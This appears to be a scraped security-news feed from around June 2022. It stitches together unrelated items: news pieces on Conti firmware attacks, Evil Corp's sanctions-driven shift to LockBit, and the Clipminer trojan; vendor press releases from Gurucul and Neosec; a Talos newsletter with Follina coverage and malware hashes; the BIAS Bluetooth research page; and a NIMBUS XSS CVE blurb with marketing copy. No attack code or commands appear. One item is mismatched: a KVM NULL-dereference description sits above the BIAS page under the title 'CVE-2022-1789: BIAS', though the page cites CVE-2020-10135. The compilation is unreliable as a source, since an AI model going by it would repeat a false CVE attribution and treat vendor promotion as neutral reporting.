Conti threat actors are betting chipset firmware is updated less frequently than other software — and winning big, analysts say.

Leaked communications from within the Conti threat group reveal the Moscow-backed cybercrime group has honed its firmware attack skills and is actively targeting Intel Management Engine (ME), a microcontroller inside many iterations of the modern Intel chipset, according to a new report.

The analysis, from Eclypsium, notes that Intel chipsets aren't being targeted by Conti because they have vulnerable code, but rather the group assumes firmware patching is spotty at best. In addition, firmware attacks can evade most security tools, the analysts added.

"This can leave some of the most powerful and privileged code on a device susceptible to attack," the report detailing the Conti firmware attacks said. "The recent Conti leaks mark a critical phase in the rapidly evolving role of firmware in modern attacks."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Intel Chipset Firmware Actively Targeted by Conti Group

Gurucul automating threat detection, investigation and response (TDIR) with advanced analytics, comprehensive threat content, and a flexible enterprise risk engine for hybrid and multi-cloud environments.

RSAC 2022, Gartner SRM 2022, and Los Angeles, Calif. – Jun 2, 2022 – Gurucul, the leader in Next-Gen SIEM, XDR, UEBA and Identity Access Analytics, today announced availability of the Gurucul Security Analytics and Operations Platform. A cloud-native, unified and modular platform for consolidating core security operations center (SOC) solutions with the vital addition of Identity Threat Detection and Response (ITDR) provides a unified next-gen SOC platform. The Gurucul platform converges the company’s award winning Next-Gen SIEM, XDR, User and Entity Behavior Analytics (UEBA), Network Traffic Analysis (NTA), Security Operations and Automation Response (SOAR), and Identity Access Analytics (IAA) into a single pane of glass that is aligned with the evolving needs of the modern enterprise threat landscape – where identity has become the new perimeter.

Gurucul’s innovative platform is purpose-built to automate and accelerate data collection, event and alert correlation, detection triage, investigation, and response to targeted attacks. It combines threat intelligence with an enterprise-class risk engine, delivering precise contextual detections, prioritized investigation, and risk-driven response actions that drastically reduce mean-time-to-detection (MTTD) and mean-time-to-response (MTTR). Gurucul’s platform can also support the most complex deployments including on-premise, hybrid, and cloud (SaaS, private, GovCloud, and multi-cloud including multi-tenancy), addressing the needs of today’s modern enterprise and managed detection and response (MDR) providers.

With increased sophistication around phishing, social engineering, credential theft, and supply chain attacks, it is more important than ever to go beyond current solutions that are overly concerned with endpoint security and focus on securing identities attached to multiple entities and devices. Based on remote work risks, accelerated cloud migration, and state-sponsored threat actor groups, there has been an increase not only in targeted and organized attack campaigns, but also insider risks and threats.

“The combination of an expanding attack surface with limited resources and constantly changing tools and techniques drives security operations teams’ need for a comprehensive and consolidated platform approach. While the endpoint is critical, we must understand and work to secure the one constant, identity, which requires a new and innovative approach to threat detection, investigation and response programs,” said Saryu Nayar, CEO of Gurucul. “Early and rapid detection occurs with a full set of endpoint, network, application, identity, cloud, and IoT telemetry context along with advanced analytics, including behavioral-based, and an extensive set of trained machine learning models. Gurucul has spent over 10 years developing specialized analytics and threat content that comprehensively covers all these datasets to eliminate manual tasks and enables automation across every stage of the security operations lifecycle.”

As organizations are transforming their SOC to support multi-cloud deployments and zero trust programs, they are looking for an end-to-end solution to help them improve security analyst effectiveness in rapidly identifying and confirming, not just threats and alerts, but the entire attack campaign. While other SIEM or XDR solutions are just starting to scratch the surface of identity, Gurucul has been a provider of Identity Analytics solutions for over a decade with robust access analytics, broad integrations with various identity systems such as IAM, PAM, HRMS, CMDB, IDaaS etc., and risk-based access remediation and authentication. In conjunction with its UEBA capabilities, Gurucul helps customers get an understanding of current-state identity access and authorization policies, and access usage anomalies and risk exposures, to plan out a robust and secure zero trust strategy. The Gurucul platform is a critical part of any ongoing zero trust program as it will continuously monitor for anomalous user behaviors, access proliferation, and access misuse/violations, ensuring zero trust policies are not being evaded by either insider or external threat actors.

"Gurucul has detection and response capability for the entire cyber kill chain, covering a range of data telemetry across complex and distributed multi-cloud deployments as well as the enterprise," said Nilesh Dherange, CTO of Gurucul. “We’ve invested over a decade in building the most powerful suite of solutions in a single platform enabling real-time threat detection, investigation, and response for our customers with a quick ROI. The addition of identity and access based threat detection to its robust TDIR capabilities powered by advanced ML models, positions Gurucul to provide innovative solutions that address the ever-changing SOC needs.”

The Gurucul platform uniquely provides a set of core capabilities that goes beyond current Next-Gen SIEM and XDR solutions that are critical in improving security operations effectiveness, including:

*   Deployment Options – On-premise, hybrid, cloud (including SaaS, private, GovCloud, and multi-cloud).
*   Multi-Cloud Threat Detection, Investigation, and Response – Real-time data ingestion, correlation, analytics, detection, and risk driven response across multiple clouds.
*   Automated Data Pipeline – An Automated Data Interpretation Engine to ingest structured and unstructured data from any source.
*   Gurucul STUDIOTM – Advanced and fully customizable analytics that include transparent machine learning models to accommodate custom use cases.
*   Enterprise-Class Risk Engine – All-encompassing analytics-driven risk scoring to accelerate investigation with high-fidelity alerts and automated responses.
*   Threat Intel & Content – The largest library of threat models, MITRE ATT&CK coverage, and curated threat intelligence powered by Gurucul Threat Labs™.
*   Gurucul MinerTM – Contextual raw and normalized search across all data silos.
*   Risk Driven Security Control Automation – Out of the box case management, playbooks, workflows, and downstream integrations with the ability to customize.
*   Identity Threat Detection and Response – Identity-centric context across enterprise and multi-cloud environments, reduced identity and access threat plane, and automated threat detection early in the kill chain.

**Availability and Pricing**

The Gurucul platform is modular, delivering customized capabilities to match individual customer requirements. This includes full multi-tenancy, data segregation, flexible policy control and rapid scaling, especially suited for MDR providers. Customers can start with a single module and expand as needed with a simple license change, building towards a unified platform with no data replication or need to start over. Gurucul offers the following packaged software solutions including Next-Gen SIEM, Open XDR, UEBA, Identity Access Analytics that include or can be delivered with Network Traffic Analysis (NTA), Security Orchestration, Automation and Response (SOAR), and Fraud Analytics as stand-alone or add-on options. Gurucul’s Security Analytics and Operations Platform is available immediately from Gurucul and its business partners worldwide.

To learn more visit www.gurucul.com, or see a demo at the RSA Conference 2022 in San Francisco, Calif., June 6-9 at Booth #1443 or at Gartner SRM 2022 in National Harbor, MD, June 7-10 at Booth #1113.

**About Gurucul**

Gurucul is a global cyber security company that is changing the way organizations protect their most valuable assets, data and information from insider and external threats both on-premises and in the cloud. Gurucul’s real-time Cloud-native Next-gen Security Operations Platform provides customers with Open XDR, Next Generation SIEM, UEBA, and Identity Analytics. It combines machine learning behavior profiling with predictive risk-scoring algorithms to predict, prevent, and detect breaches. Gurucul technology is used by Global 1000 companies and government agencies to fight cybercrimes, IP theft, insider threat and account compromise as well as for log aggregation, compliance and risk-based security orchestration and automation for real-time extended detection and response. The company is based in Los Angeles. To learn more, visit https://gurucul.com/ and follow us on LinkedIn and Twitter.

###

Gurucul Launches Cloud-Native SOC Platform Pushing the Boundaries of Next-Gen SIEM and XDR with Identity Threat Detection and Response

Microsoft Philanthropies is expanding its cybersecurity skills for jobs campaign to 23 countries and partnering with Women in CyberSecurity (WiCyS) to build a cybersecurity workforce that is not just larger but also more diverse.

COOKEVILLE, TENN. (PRWEB) JUNE 02, 2022

As cyberthreats continue to expand and progress worldwide, the need for qualified cybersecurity professionals is increasing with experts predicting there will be 3.5 million cybersecurity jobs open by 2025, a 350% increase over eight years. Microsoft Philanthropies is expanding its cybersecurity skills for jobs campaign to 23 countries and partnering with Women in CyberSecurity (WiCyS) to build a cybersecurity workforce that is not just larger but also more diverse.

The expansion will include: Australia, Belgium, Brazil, Canada, Colombia, Denmark, France, Germany, India, Ireland, Israel, Italy, Japan, Korea, Mexico, New Zealand, Norway, Poland, Romania, South Africa, Sweden, Switzerland, and the United Kingdom.

The countries were chosen because of an elevated cyberthreat risk, gap in the workforce and lack of diversity. One of the traditionally excluded populations Microsoft wants to provide opportunities for are women, who are significantly underrepresented. In the countries where Microsoft expanded its cybersecurity skilling campaign, only 17% of the cybersecurity workforce are female. Microsoft is working to understand the skills gap, offering free training, helping train more teachers, and providing more support to diverse and underserved job seekers, which is where WiCyS will help.

WiCyS is working to expand its student chapters in the 23 countries by promoting the retention and advancement of women in cybersecurity. WiCyS has over 5,700 members worldwide, including several in those countries Microsoft is trying to engage. WiCyS also has over 160 student chapters, largely in the U.S.

WiCyS student chapters receive funding, access to resources and conferences as well as networking opportunities for both students and faculty advisors. The group of women, men, allies, and advocates meets monthly to participate in CTFs, hackathons, engage in cyber trivia, and learn new technical skillsets. Other events include hosting resume workshops, mock interviews, career development panels, speed networking events and more.

“Thanks to this collaboration, WiCyS seeks to expand our global cyber sisterhood far and wide,” said Lynn Dohm, WiCyS executive director. “While WiCyS works to ensure equity in the gender imbalanced cybersecurity workforce, the student chapter initiative creates a community on campuses so that women are retained in their field of study, grow their network, and have a reliable gateway for future advancement opportunities.”

For more information on the Microsoft Philanthropies Global Student Chapter Initiative, visit http://www.wicys.org/initiatives/wicys-global-student-chapter-initiative-made-possible-by-microsoft-philanthropies/

**About WiCyS:**  
Women in CyberSecurity (WiCyS) is a nonprofit organization with international reach dedicated to the recruitment, retention and advancement of women in cybersecurity. Founded by Dr. Ambareen Siraj from Tennessee Tech University through a National Science Foundation grant in 2013, WiCyS offers opportunities, trainings, events, and resources for its members. Strategic partners include Tier 1: Amazon Web Services, Bloomberg, Carnegie Mellon University – Software Engineering Institute, Cisco, Fortinet, Google, Intel, Lockheed Martin, Meta, Microsoft, Optum, Sandia National Laboratories, SentinelOne. Tier 2: Abbvie, JPMorgan Chase & Co., Linkedin, McKesson, Navy Federal Credit Union, Nike, Wayfair, Workday. To partner, visit https://www.wicys.org/support/strategic-partnerships/.

Microsoft Philanthropies Collaborates With WiCyS to Help Close the Cybersecurity Skills Gap

The threat actor behind the notorious Dridex campaign has switched from using its exclusive credential-harvesting malware to a ransomware-as-a-service model, to make attribution harder.

Sanctions that the US government imposed on Russia-based crimeware gang Evil Corp in 2019 appear to have forced the threat actor to change tactics to remain in the cybercrime business.

New research into the group's activity by Mandiant shows that after the sanctions were put in place — after the group caused more than $100 million in losses to banks and other financial institutions by stealing sensitive information — Evil Corp switched to using ransomware in an apparent effort to obscure attribution. 

Moving on from using Dridex, its own exclusive (and easily fingerprinted) malware, Evil Corp actors have been observed deploying ransomware families used by multiple threat groups, such as Hades, WastedLocker, PhoenixLocker, and most recently LockBit, a ransomware-as-a-service option.

US regulations prohibit organizations — including ransomware victims and negotiators — from conducting any kind of financial transactions with organizations and entities on the US Treasury Department's Office of Foreign Assets Control (OFAC) sanctions list.

"\[US\] sanctions have had a direct impact on threat actor operations, particularly as at least some companies involved in ransomware remediation activities, such as negotiation, refuse to facilitate payments to known sanctioned entities," Mandiant says in its report. "This can ultimately reduce threat actors' ability to be paid by victims, which is the primary driver of ransomware operations."

That means US ransomware victims need to pay closer attention to whom they are dealing with, says Jeremy Kennelly, senior manager of financial crime analysis at Mandiant Threat Intelligence.

"When dealing with a ransomware intrusion, the particular malware being deployed, or the branding on ransom notes, or shaming websites may be insufficient to determine whether the beneficiary of payments has affiliations with Evil Corp, a sanctioned entity," he says.

**Sanctions Crunch**

OFAC sanctioned Evil Corp and two members associated with the group for stealing more than $100 million from financial institutions in 40 countries using credentials harvested with the Dridex malware tool.

Around the time the sanctions were imposed, Evil Corp had begun renting out Dridex for use by affiliate gangs. It also had begun making its own foray into the ransomware space, initially with BitPaymer ransomware and later with DopplePaymer and WastedLocker in 2019. 

In 2020 Evil Corp. targeted more than two-dozen US organizations with ransomware, including several Fortune 500 companies in a massive WastedLocker campaign. Months after the sanctions went into effect, the threat actor stopped using WastedLocker and soon after switched to a variety of other tools, such as Hades and most recently LockBit — a ransomware-as-a service tool that gives the threat actor an opportunity to blend in with other actors.

**UNC2165: Another Evolution of Evil Corp.**

Mandiant says since 2019 it has investigated multiple LockBit ransomware intrusions carried out by a group that the vendor is currently tracking as UNC2165. According to Mandiant, UNC2165 has a lot of overlap with Evil Corp and is most likely an actor closely affiliated with it. For instance, in all the intrusions that Mandiant investigated, UNC2165 obtained access to the victim network via UNC1543, a financially motivated threat group that distributes FakeUpdates, a multistage JavaScript dropper for distributing malware. FakeUpdates was also the infection chain for deploying Dridex that later resulted in BitPaymer and DopplePaymer ransomware infections.

Similarly, the Hades ransomware family that Mandiant observed UNC2165 deploying had multiple code similarities to other ransomware tools tied to Evil Corp. Several of the command-and-control servers that UNC2165 has been observed using have also been linked to Evil Corp infrastructure, Mandiant says.

"The operational relationship between UNC2165 and the broader Evil Corp group is not fully understood," Kennelly says. "Mandiant has observed UNC2165 deploying Hades ransomware and operating Hades-related infrastructure. Furthermore, multiple public reports related to the deployment of other ransomware families commonly attributed to Evil Corp have involved use of infrastructure Mandiant attributes to UNC2165."

Kennelly says it's unclear what impact Mandiant's report tying an Evil Corp-related actor to LockBit will have in the ransomware space. 

"The impact this disclosure will have on ransomware negotiators is difficult to predict," he says. "LockBit may quickly move to distance themselves from affiliates with ties to Evil Corp, or deny the allegations wholesale," he says.

Furthermore, UNC2165 has shifted their operations multiple times over the past years, and this may ultimately lead to them to again adopt an updated toolkit if ransomware negotiators halt work on LockBit cases, he notes.

US Sanctions Force Evil Corp to Change Tactics

Neosec threat hunters from the 'ShadowHunt' team jumpstart the API Security process quickly and help build the knowledge in today's overstretched security teams.

PALO ALTO, Calif., June 2, 2022 /PRNewswire/ -- Neosec, the pioneer in discovering and identifying API threats using behavioral analytics, today announced the availability of ShadowHunt, an expert-staffed managed threat hunting service to augment its platform with human oversight from active threat hunters to identify the most clandestine and obfuscated API abuse. Borrowing from threat hunting capabilities in EDR and XDR, Neosec brings similar techniques to API security. ShadowHunt gives security teams peace of mind that API security experts are examining abnormal behavior on their API estate.

Combining the ShadowHunt service with the Neosec cloud-based platform enables organizations to manage the increasing risk to core business systems, assets and data from manipulation, theft or misuse. The service is ideal for companies where security teams are short-staffed or lack the expertise needed to identify threats in business API traffic, because APIs are increasingly used to connect important business systems to customers, suppliers, and partners.

"The increasing potential for insiders or attackers to utilize business APIs for criminal or malicious gain requires a new level of scrutiny and sophistication," said Giora Engel, co-founder and chief executive officer, Neosec. "The new ShadowHunt service augments our platform with an expert team to monitor API usage and hunt for fraud, abuse or critical vulnerabilities without any drain on an organization's existing security team."

Rather than focusing only on vulnerabilities within APIs, the Neosec platform addresses the problem by first automatically and continually identifying all APIs a company has in use, evaluating their risk posture and monitoring user behavioral anomalies that could involve data theft or other misuse. Most companies lack a complete API inventory, let alone understand the nature of normal API usage. Few have the ability to monitor their APIs to mitigate loss or detect abuse of business processes, financial assets and data within their APIs. Now, the ShadowHunt service can augment use of the Neosec platform with a team of experts to respond to findings quickly, investigate potential threats and recommend immediate remediation and actions.

Besides the incidents and alerts provided by the dedicated expert team of threat hunters, the ShadowHunt service also includes a monthly report to summarize findings and investigations performed by the team, news of emerging API threats discovered by Neosec across many different companies and notable changes in the use and operation of APIs currently employed by a company. The service also includes full "Ask the Experts" access to the team of threat hunters.

The ShadowHunt service and the Neosec platform together provide an effective way to quickly incorporate full monitoring and investigation of anomalous business API usage without impacting existing security operations and team workload. The combination can add protection against vulnerability exploits and API business abuse quickly and transparently.

**For more information:**

*   Read more: ShadowHunt Managed Threat Hunting
*   Datasheet: ShadowHunt Managed Threat Hunting

**About Neosec**

Neosec is re-inventing application security with a powerful platform that unifies security and development teams to protect modern applications from threats. The foundation of the SaaS platform is built on data and analytics to manage security at scale. Neosec prevents threats from abusing the complex network of APIs that connect today's businesses. The platform helps organizations discover every API and audit risk. Neosec has pioneered the use of behavioral analytics to understand normal versus abnormal API usage and delivers powerful threat hunting capabilities together with a team of expert threat hunters. Neosec prevents threats and stops abuse hiding within APIs and brings new intelligence to application security. Neosec is based in Palo Alto, California with R&D in Tel Aviv, Israel. To learn more, visit Neosec.com.

_SOURCE Neosec_

Neosec Introduces Expert Managed Threat Hunting Service for Detecting and Investigating API Abuse and Vulnerabilities

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
Many of you readers may be gearing up for a West Coast swing over the next few weeks through San Francisco and Las Vegas for RSA and Cisco Live, respectively. And we’re right behind you!  
Talos...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

Many of you readers may be gearing up for a West Coast swing over the next few weeks through San Francisco and Las Vegas for RSA and Cisco Live, respectively. And we’re right behind you!  

Talos will have plenty of representation at both conferences, including giving lightning talks at the Cisco Secure booth, several features talks and spots, live podcast recordings, and more. To get you ready for RSA, I wanted to highlight a few special things we’re doing at the conference you should know about before you go.  

As always, you can keep posted on our latest plans and talk schedule by following us on Twitter. 

**Main booth** 

Stop by the main Talos and Cisco Secure booth at Moscone North Hall to say hi, ask questions and get the latest information on what we’re up to. 

At the booth, we’ll be premiering a new video series and giving out some of our newest stickers created in the image of our favorite malware “mascots.” Everyone will be jealous if you have one of these on your laptop. 

**Evolving Your Defense: Making Heads or Tails of Threat Actor Trends** 

Nick Biasini and Pierre Cadieux are hosting our sponsored session on June 7 at 9:40 a.m. PT. In this talk, they’ll be breaking down the latest threat actor tactics, techniques and procedures and telling you which ones you should be worried about and what can be ignored. 

**Beers with Talos/Security Stories** 

We’re hosting two live podcasts back-to-back at the Marriott Marquis: Sierra C ballroom from 2 – 5 p.m. PT on June 7. Security Stories and Beers with Talos are getting together to play a game of “Would I lie to you?”  

Talos’ vice president, Matt Watchinski, will be on hand for both episodes, along with other special guests.  

The Beers with Talos episode will cover Talos’ work in Ukraine, and we’ll hear from the audience about their hottest security takes.  

**The one big thing **

A recently discovered zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. CVE-2022-30190, also known under the name "Follina," exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft Word or via an RTF file. An attacker could exploit this vulnerability to gain the ability to run arbitrary code on the targeted system. 

  

> **Why do I care? **
> 
> If an attacker were to successfully exploit this vulnerability, they could execute remote code on the targeted machine. Needless to say, that’s bad. This is just the latest in a string of Microsoft vulnerabilities to make headlines over the past 12 months, including PrintNightmare and multiple Exchange Server issues. If those cases have taught us anything, it’s that attackers aren’t afraid to look for vulnerable Microsoft products to try and gain a foothold on a targeted network or machine.  
> 
> **So now what? **Although a patch hasn't been released yet, Microsoft has provided workarounds and Windows Defender protections for the CVE and malware exploiting this vulnerability. Cisco Talos has also released coverage to protect against this vulnerability, including multiple Snort rules and a ClamAV signature.   

**Other news of note**

Costa Rica’s government was hit with another ransomware attack, this time from the Hive group. Hive took down the country’s health department’s online services earlier this week, adding to the problems Costa Rica is facing after Conti launched a ransomware attack in May. Security experts say there is evidence that Conti and Hive may be working together to extort the Costa Rican government. This is all going on as the Conti group claims it’s shutting down and splitting up into smaller groups. The Hive operators have not yet declared a ransom amount. (Bleeping Computer, Krebs on Security, CSO Online) 

The U.S. Department of Justice seized three domains associated with selling and collecting stolen and leaked personal information. Authorities said the sites, WeLeakInfo, IPStress and OVH Booster all assisted attackers in carrying out denial-of-service attacks. In 2020, the DoJ seized very similar domains, including “weleakinfo.com,” which at the time, offered users the ability to “review and obtain the personal information illegally obtained in over 10,000 data breaches.” (Recorded Future, Department of Justice) 

The FBI recently thwarted an attempted cyber attack on a Boston children’s hospital, according to the agency’s director. Chris Wray, speaking at an event in Boston, received intelligence last summer ahead of time that allowed the agency to stop what he called “one of the most despicable cyberattacks I've seen.” Wray added that the attack came from an Iranian state-sponsored actor. The same hospital faced similar attacks in 2014 and 2019, he said. (ABC News, NBC 10 Boston) 

**Can’t get enough Talos? **

*   Researcher Spotlight: Martin Lee, EMEAR lead, Talos Strategic Communications
*   Threat Roundup for May 20 - 27
*   Talos Takes Ep. #98: Maybe don't panic about that F5 BIG-IP vulnerability

  

**Upcoming events where you can find Talos ****REcon (June 3 – 5, 2022)  
Montreal, Canada ****RSA 2022 (June 6 – 9, 2022)  
San Francisco, California ****Cisco Live U.S. (June 12 – 16, 2022)  
Las Vegas, Nevada ****Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  **MD5:** 93fefc3e88ffb78abb36365fa5cf857c  **Typical Filename:** Wextract    
**Claimed Product:** Internet Explorer    
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

**SHA 256:** 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645    **MD5:** 2c8ea737a232fd03ab80db672d50a17a    **Typical Filename:** LwssPlayer.scr      
**Claimed Product:** 梦想之巅幻灯播放器      
**Detection Name:** Auto.125E12.241442.in02    

**SHA 256:** 4b34e3637fa7af93ab628ae5adad2c7f3464053316963297844324a4f649a206   
**MD5:** 3632f27604f5a82cf73b9ade710a1656  **Typical Filename:** mediaget\_installer\_467.exe    
**Claimed Product:** N/A    
**Detection Name:** FileRepPup:MediaGet-tpd  

**SHA 256:** a9f7d7525aad1c7007ae9d1d3fc531a1065b28225c5b7efb7347aaf77d9aba92    
**MD5:** 8f90e544a48d75f42f9d44811320689c   **Typical Filename:** tata communications wholesale retai lpak ncl ethopia napal spice srilanka bd cli bangladesh.wsf    
**Claimed Product:** N/A     
**Detection Name:** Xml.Dropper.Valyria::100.sbx.vioc  

**SHA 256:** 85B936960FBE5100C170B777E1647CE9F0F01E3AB9742DFC23F37CB0825B30B5   **MD5:** 8c80dd97c37525927c1e549cb59bcbf3   **Typical Filename:** Eternalblue-2.2.0.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Exploit.Shadowbrokers::5A5226262.auto.talos

Threat Source newsletter (June 2, 2022) — An RSA Conference primer

The malware targets Windows users via Trojanized downloads of cracked or pirated software and then starts in on cryptocurrency mining and clipboard hijacking.

The malware known as Clipminer has earned cyberattackers $1.7 million in cryptocurrency mining and theft via clipboard hijacking so far – and it shows no signs of abating.

The Clipminer Trojan, which sports numerous similarities to the KryptoCibule cryptomining Trojan, was discovered by Symantec’s Threat Hunter Team. Its whole raison d'etre is to enable fraudulent cryptocurrency transactions.

The team determined that Clipminer is likely spread through Trojanized downloads of cracked or pirated software. The infection chain begins with a self-extracting WinRAR archive and then executes a downloader file, which connects to the Tor network to download Clipminer’s components.

The malware can redirect cryptocurrency transactions made on the infected computer by replacing cryptocurrency wallet addresses copied to a clipboard with new addresses under the control of the hacker. Clipminer uses addresses matching the prefix of the targeted original address to disguise the manipulation.

The team noted that the malware contains 4,375 unique addresses of wallets controlled by the attacker, of which the vast majority were used for just three different formats of Bitcoin addresses.

The malware also uses cryptocurrency-mixing services, known as tumblers, which can help hide the fund’s original source.

Dick O’Brien, principal editor for the Symantec Threat Intelligence Team, tells Dark Reading that one of the very first questions the team asked when it started looking at Clipminer was whether the person or people behind it are making any money. The answer was yes.

“That can really help you gauge how much of a threat this is,” he explains. “If it’s profitable, they’re not going to quit, and the odds are they’ll want to expand."

What’s interesting about Clipminer, he adds, is that it seems to tread the line between making good money while maintaining a relatively low profile.

“I don’t know whether that’s by accident or design,” O’Brien says. “It’s a relatively sophisticated botnet. It’s not just your average coinminer. It’s a dual-pronged threat since it’s also capable of stealing via clipboard hijacking. And the latter is done pretty stealthily.”

He points out that Clipminer goes to some lengths to disguise the fraudulent transactions and noted the group has thousands of payment addresses. It picks the one that most resembles a legitimate payment address for each victim.

“The obvious threat for enterprises is that any kind of coinminer is a drain on computing resources,” O’Brien says. “But beyond that, you don’t want any kind of botnet getting a foothold on your network. We’ve seen in the past how botnets can evolve and be repurposed to deliver other, more potent threats.”

All of the usual best practices apply to protect against these kinds of threats, he adds, but in this case avoiding nonlegitimate software resources is the best protection.

“You need to audit what software is running on your network, and any unauthorized software, whether it’s pirated or not, needs to be addressed,” he says.

The really interesting question at the moment is how cryptocurrency-mining threats are going to evolve in the near future, O’Brien says.

“We’ve seen a lot of instability in the cryptocurrency space and even speculation that we’ll see a major crash," he says. "Obviously if the coins are worthless or near worthless, there’s going to be less interest in mining them. But that's just the start of it. Any major upheaval will have a much wider impact. Crypto underpins the entire cybercrime ecosystem.”

'Clipminer' Malware Actors Steal $1.7 Million Using Clipboard Hijacking

With shadow paging enabled, the INVPCID instruction results in a call to kvm_mmu_invpcid_gva. If INVPCID is executed with CR0.PG=0, the invlpg callback is not set and the result is a NULL pointer dereference.

**BIAS: Bluetooth Impersonation AttackS**

**About the BIAS attack**

TL;DR: The Bluetooth standard provides authentication mechanisms based on a long term pairing key, which are designed to protect against impersonation attacks. The BIAS attacks from our new paper demonstrate that those mechanisms are broken, and that an attacker can exploit them to impersonate any Bluetooth master or slave device. Our attacks are standard-compliant, and can be combined with other attacks, including the KNOB attack. In the paper, we also describe a low cost implementation of the attacks and our evaluation results on 30 unique Bluetooth devices using 28 unique Bluetooth chips.

**Details**

Bluetooth Classic (also called Bluetooth BR/EDR) is a wireless communication protocol commonly used between low power devices to transfer data, e.g., between a wireless headset and a phone, or between two laptops. Bluetooth communications might contain private and/or sensitive data, and the Bluetooth standard provides security features to protect against someone who wants to eavesdrop and/or manipulate your information. We found and exploited a severe vulnerability in the Bluetooth BR/EDR specification that allows an attacker to break the security mechanisms of Bluetooth for any standard-compliant device. As a result, an attacker can impersonate a device towards the host after both have previously been successfully paired in absence of the attacker.

We call our attack Bluetooth Impersonation AttackS (BIAS). Because this attack affects basically all devices that “speak Bluetooth”, we performed a responsible disclosure with the Bluetooth Special Interest Group (Bluetooth SIG) - the standards organisation that oversees the development of Bluetooth standards - in December 2019 to ensure that workarounds could be put in place.

**Are My Devices Vulnerable?**

The BIAS attack is possible due to flaws in the Bluetooth specification. As such, any standard-compliant Bluetooth device can be expected to be vulnerable. We conducted BIAS attacks on more than 28 unique Bluetooth chips (by attacking 30 different devices). At the time of writing, we were able to test chips from Cypress, Qualcomm, Apple, Intel, Samsung and CSR. All devices that we tested were vulnerable to the BIAS attack.

After we disclosed our attack to industry in December 2019, some vendors might have implemented workarounds for the vulnerability on their devices. So the short answer is: if your device was not updated after December 2019, it is likely vulnerable. Devices updated afterwards might be fixed.

**Team**

**Daniele Antonioli****Postdoc at the EPFL**

Cyber-Physical Systems Security, Network Security, Wireless Security, Embedded Systems Security, Applied Cryptography, SoCurity

**Kasper Rasmussen****Faculty**

Security of Wireless Networks, Protocol design, Applied Cryptography, Security of embedded systems, Cyber-physical systems

**Nils Ole Tippenhauer****Faculty**

Security of Cyber-Physical Systems, Security of Physical-Layer Wireless, IoT Security

**Related Publications**

**Recent & Upcoming Talks**

**Media Coverage**

*   social
    
    *   Reddit Thread
*   CERT
    
    *   CVE-2020-10135
    *   https://www.kb.cert.org/vuls/id/647177/
*   Bluetooth SIG
    
    *   2020/05/18 “Bluetooth SIG Statement Regarding the Bluetooth Impersonation Attacks (BIAS) Security Vulnerability” by the Blueooth SIG
*   Selected EN press
    
    *   2020/05/19: MSN, “Smartphones, laptops, IoT devices vulnerable to new BIAS Bluetooth attack” by Catalin Cimpanu
    *   2020/05/21: TimesNowNews, “Smartphones, laptops, IoT devices from Apple, Intel, Samsung vulnerable to new BIAS Bluetooth attack” by Krishna SinhaChaudhury
    *   2020/05/19: SecurityAffairs, “Boffins disclosed a security flaw in Bluetooth, dubbed BIAS, that could potentially be exploited by an attacker to spoof a remotely paired device” by Pierluigi Paganini
    *   2020/05/19: WeLiveSecurity, “Bluetooth flaw exposes countless devices to BIAS attacks” by Amer Owaida
    *   2020/05/19: forklog, “Hackers Can Impersonate Bluetooth Devices to Steal Users’ Personal Data: Is This a Threat to You?" by Ana Alexandre
    *   2020/05/19: The Hacker News, “New Bluetooth Vulnerability Exposes Billions of Devices to Hackers” by Ravie Lakshmanan
    *   2020/05/18: ZDNet, “Smartphones, laptops, IoT devices vulnerable to new BIAS Bluetooth attack” by Catalin Cimpanu
    *   2020/05/19: CISO Mag, “New BIAS Vulnerability Affects All Modern Bluetooth Devices” by CISOMAG
    *   2020/05/18: ThreatsHub, “Smartphones, laptops, IoT devices vulnerable to new BIAS Bluetooth attack” by TH Author
    *   2020/05/18: ROOTDAEMON.com, “Smartphones, laptops, IoT devices vulnerable to new BIAS Bluetooth attack” by ROOTDAEMON
    *   2020/05/19: ITPro, “Bluetooth pairing flaw exposes devices to BIAS attacks” by Keumars Afifi-Sabet
    *   2020/05/19: MyBroadband, “New security flaw affects almost all Bluetooth devices” by Bradley Prior
*   Selected ES press
    
    *   2020/05/19: El Español, “Bluetooth es un peligro: descubren que es posible engañar a tu móvil” by Adrián Raya
*   Selected IT press
    
    *   2020/05/19: PuntoInformatico, “BIAS: nuova vulnerabilità nel Bluetooth” by Giacomo Dotta
*   Selected DE press
    
    *   2020/05/21: Heise.de, “Bluetooth-Sicherheitslücke ermöglicht unerkannte Angriffe”

CVE-2022-1789: BIAS

Black Rainbow NIMBUS before 3.7.0 allows stored Cross-site Scripting (XSS).

*   Case Management
*   Orchestration & Automation
*   Quality Management System
*   Investigation Management
*   Phaneros Portal
*   Forensic Lab Management
*   Crime Scene Investigation
*   Resource (People, Process, Technology, Time, Data) Management
*   Nimbus Cloud & Saas
*   Nimbus Intelligence
*   Incident Response Lifecycle Management
*   Resource Library
*   Support
*   Contact

Skip to content

*   Government
*   Military
*   Corporate
*   Law enforcement

**COMPLEX OPERATIONS PLATFORM**

**VISUAL ANALYTICS**

**INVESTIGATION MANAGEMENT**

**On Prem - Cloud - SaaS**

**MODULAR DESIGN**

Corporate

**NIMBUS**

**Investigation Control**

NIMBUS provides total control and oversight to any investigation allowing USERS, PROCESS & TECHNOLOGY to seamlessly work together within the connected fabric of the COMPLEX OPERATIONS PLATFORM.

Explore the core NIMBUS modules.

**Investigation Management**

**Organised & Complex Investigation Lifecycle Platform**

Streamline complex Investigations by harnessing the Governance, Case Management, Quality Management, Orchestration and combine them with full disclosure management, Document Review and mark up, Actions management, Case analytics, Configurable Dashboards and management reporting to unravel any complexity in the  investigation along with full disclosure review and Digital Case file production.

**Investigation Management**

**Packed with features including:**

**Case Management**

**Digital & Traditional case management**

Solving everyday case management problems surrounding integrity, efficiency, evidence tracking, asset management, full management reporting and by combing solutions into a simple and intuitive user experience seamlessly integrating with all NIMBUS modules.

**Case Management**

**Packed with features including:**

